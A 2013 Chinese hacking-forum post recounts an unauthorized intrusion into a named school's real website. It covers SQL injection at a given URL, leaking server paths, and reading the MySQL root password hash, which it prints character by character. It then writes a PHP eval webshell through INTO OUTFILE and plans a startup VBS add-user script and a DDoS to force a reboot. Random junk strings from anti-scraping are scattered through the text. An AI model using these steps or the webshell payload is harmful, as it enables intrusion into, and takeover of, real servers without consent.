找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2498|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 }" R5 P+ }9 o( C. j. j8 U" J
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
2 t" T3 \/ x: |" s) U& S% Y- V0 ^
  h/ c% u- \. u' Z

" N( j# n+ H, d. P# w常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ) v: ?; j/ e5 K& y) a: @

: t. m7 O- ~7 j. B4 ~5 X' Q那么想可以直接写入shell ,getshell有几个条件:
2 K; N. u* Y6 l8 A0 z9 e8 Q
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF' y! `9 z! q( E) w2 j
( g, h& M0 d' {: F$ {
试着爆绝对路径:
& G: T1 Z2 k' ~$ S1./phpMyAdmin/index.php?lang[]=1  
) d2 n* a- |/ f: r8 p2./phpMyAdmin/phpinfo.php  : P7 k/ E9 n% n) x
3./load_file()  
% P$ E6 y0 V+ V1 M2 @6 h, e9 }4./phpmyadmin/themes/darkblue_orange/layout.inc.php  # F* x+ {0 M8 C. v6 U; e/ I0 e
5./phpmyadmin/libraries/select_lang.lib.php  ' E/ x$ S" v1 s: `7 G  f' \& _
6./phpmyadmin/libraries/lect_lang.lib.php  $ d- ]; U0 g+ X" N2 D
7./phpmyadmin/libraries/mcrypt.lib.php   
: ?. z& d6 F% s8./phpmyadmin/libraries/export/xls.php  $ @# W7 j, d" I8 D
- ^2 `( K! D' s6 D
均不行...........................
3 c8 W" R' ^+ x' n( g$ t0 f$ ]) p! v1 [, {. b, f* I0 V6 G% _
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
  E& a7 S5 l2 q: h. T2 `8 N5 L1 b9 y6 \. r3 H
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 3 ~4 ^# H- ]3 Z8 _
8 I+ j* K6 N0 G$ u5 m& z
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败! O- O+ i3 Y( E

1 o" F3 t9 k2 c6 y+ z1 O' y8 a敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
0 P  S+ r* R: w& I4 C6 u/ T& G8 a6 \& S: Y  Q/ F& ?
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
: Q5 o0 T3 W4 T- I$ i. }/ ]# u' V! t7 T1 {6 X- ?/ U2 O! I
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
' `1 Z' ?# b1 f3 X# U4 `) P% K# Q2 k& L$ C
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 v8 I+ ~2 ]! {  f7 s# B- j# f. X" O1 O; T2 c3 `
成功读到root密码:
, h+ Z8 A: P  w
! d3 Q6 e; W! B9 R6 g17---- r(0072)
& d# J' j, Z/ G5 M6 {, [18---- o(006f)8 _+ L  w0 q- S( b4 |' b! a4 ]
19---- o(006f)
0 _- ?1 k0 S+ [; Q( ]+ s: ]' k20---- t(0074)+ J. x8 x5 x! j% C( W: v0 `
21---- *(002a)
6 E# k) C/ r8 v/ b+ M, S22---- 8(0038)/ s' J4 M: ?) e5 p2 M
23---- 2(0032)
- w1 P8 B( s( K24---- E(0045)
9 Y) k6 ?! F$ J% R$ E1 R: u+ p5 @& g+ y25---- 1(0031)
8 p, n: g1 [3 |" Z26---- C(0043). i9 k. `0 E) y8 E3 Z0 v4 n; k
27---- 5(0035)
" v; N- ?" H- U28---- 8(0038)
) J2 r  G. ?9 J1 `& b* `+ @: t29---- 2(0032)
% B1 N+ c2 d  Z3 J$ b) y1 |+ f30---- 8(0038)* v$ p7 D0 P: c- |
31---- A(0041): b0 a/ n, y" \$ E9 @3 l- F
32---- 9(0039)
1 u- z2 V" l3 d  l1 n33---- B(0042)
* T5 c8 G/ B9 j( A34---- 5(0035)& d/ I$ Z7 c6 o" g
35---- 4(0034)
# f' Q5 X5 A) L36---- 8(0038); z8 g8 l9 E* W- X% a" ^
37---- 6(0036)4 B: B3 F) u3 Z: @
38---- 4(0034), f+ Z7 }3 j, u4 @/ m$ H% S
39---- 9(0039)3 y& M8 w: T3 ~5 x9 \
40---- 1(0031)
0 T6 U0 m. B9 G: z6 A41---- 1(0031); R9 c1 z& n( |$ C+ y- M
42---- 5(0035)* j- @& z% X' c! }. \, j5 t
43---- 3(0033)$ X8 k+ {7 x. ]: h6 B8 f, c
44---- 5(0035); r0 |; b& m0 W8 \4 I; N+ Q
45---- 9(0039)
2 L0 ^5 I; L6 l" j( W46---- 8(0038)
+ E0 L# {9 Q, _, R1 B. R47---- F(0046). s# Q4 Z/ _2 y/ Z: {+ S
48---- F(0046)
6 ]& s1 B0 e) T6 d7 O49---- 4(0034)1 A% s% ~" _$ Y* q/ g
50---- F(0046)
% P/ K. u% }3 d51---- 0(0030)
. Z# o) H/ N; X52---- 3(0033)
8 n4 U9 y1 g% X. q+ n: g0 f53---- 2(0032)& z( C, m! M1 A5 q! z
54---- A(0041)+ R7 B% ~6 E6 t: o0 _8 o- e
55---- 4(0034)$ n) ]" U+ A5 z+ b9 [* b& ]0 D
56---- A(0041)
4 q- G1 X$ F% }57---- B(0042)
5 Q" W3 t" R/ j* K* h* Z8 C58---- *(0044)
& o  r: M/ A) K8 E2 e) M7 o. y6 T59---- *(0035)( W3 K) ?# ?' U" q
60---- *(0041)
5 L3 }, A5 N1 o% B& O61---- *0032)0 C, K6 v/ B3 W* b7 H$ Y

0 U1 \8 b, ^' Y( x  _/ ^" N- H0 A/ \解密后成功登陆phpmyamin
) _! O( a0 F3 Q- `) W+ ]1 S# _7 ~                          / `. Z& ~' n& q6 b
# ?; e, n5 X8 C% y
                             
. V. x4 j6 D7 r* Q5 ^/ {) J  Q8 D/ V  g4 @7 T) m- `8 p3 Q* l
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'7 \* Q5 w/ r0 i) _9 T9 \, e
/ u0 W* Q( O8 V' h6 E! F
成功执行,拿下shell,菜刀连接:7 f5 C6 ~# t2 \. K$ i2 H; L2 \

4 ^/ |6 ]* ~/ m. j: h5 d6 P: J. l" h服务器不支持asp,aspx,php提权无果...................
: |1 e) q$ a& b  Q$ l/ _9 D, k- R/ A# `
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
# I7 l( Y' A' K7 Y$ y- [! y7 O% ]
服务器上已经有个隐藏帐号了

* w/ t" J0 u9 ^" O  H# d
别名     administrators
7 d- j- s3 ]8 K& H" H1 P: f) x注释     管理员对计算机/域有不受限制的完全访问权

2 Q; O& P4 W1 {. k9 @+ K+ s; C
成员
0 @3 [5 m3 r. i# r: S- e
-------------------------------------------------------------------------------) }4 H8 q$ A; x0 x' J6 |
admin
3 ^9 {. @  g+ P* E. x+ fAdministrator
9 ]+ L6 l- ]# }- F- D/ }slipper$5 R: y! G. a0 \7 Y) a! p% @
sqluser
8 S$ G0 X; _9 t3 x6 Z; Q, B3 k- d命令成功完成。
8 s- S/ I) X' U$ k( h# w: B3 {
1 u0 Q; g  B, s6 w4 p服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
9 x; P& W0 Q* v$ E3 s- v9 W/ k3 n' m
ddos服务器重启,不然就只能坐等服务器重启了...............................
& |$ Q5 K4 f3 i5 ^4 m
0 `: m. i% Z! i4 ~      
$ Y# P; D; n  [, `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表